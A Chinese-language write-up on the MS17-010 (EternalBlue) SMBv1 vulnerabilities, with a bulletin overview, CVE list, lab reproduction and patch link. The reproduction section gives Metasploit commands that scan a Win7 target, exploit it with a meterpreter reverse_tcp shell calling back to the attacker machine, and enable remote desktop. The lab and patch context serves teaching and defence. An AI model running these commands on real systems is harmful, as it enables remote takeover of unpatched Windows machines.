一. 概述
此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。
对于 Microsoft Windows 的所有受支持版本,此安全更新的等级为“严重”。有关详细信息,请参阅受影响的软件和漏洞严重等级部分。
此安全更新可通过更正 SMBv1 处理经特殊设计的请求的方式来修复这些漏洞。
有关这些漏洞的详细信息,请参阅漏洞信息部分。
EternalChampion 永恒冠军(CVE-2017-0146 & CVE-2017-0147)
EternalRomance 永恒浪漫(MS17_010)
Eternal Synergy永恒协作(CVE-2017-0143)
EternalBlue 永恒之蓝(MS17_010)
详情请查阅下方微软官方文档
概览 |
---|
中文名:永恒之蓝 |
微软官方编号:MS17-010 |
CVE编号:CVE-2017-0143 |
类型:远程代码执行 |
官方评级:严重 |
影响系统:win7,winserver08,winserver08r2,win8.1,winserver12,winserver12r2,win10,winserver16 |
二. 复现
攻击机 | 靶机 |
---|---|
IP:192.168.199.130 | 192.168.199.209 |
OS:kali-linux | win7 |
ms17-010用的smb445端口
$ use auxiliary/scanner/smb/smb_ms17_010 //扫描模块
$ set rhosts 192.168.199.209
$ exploit
$ use exploit/windows/smb/ms17_010_eternalblue //攻击模块
$ set payload windows/x64/meterpreter/reverse_tcp
$ set lhost 192.168.199.130
$ set rhosts 192.168.199.209
$ run getgui -e //打开3389端口
靶机3389端口打开
$ rdesktop 192.168.199.209
三. 补丁
https://support.microsoft.com/zh-cn/help/4012598/title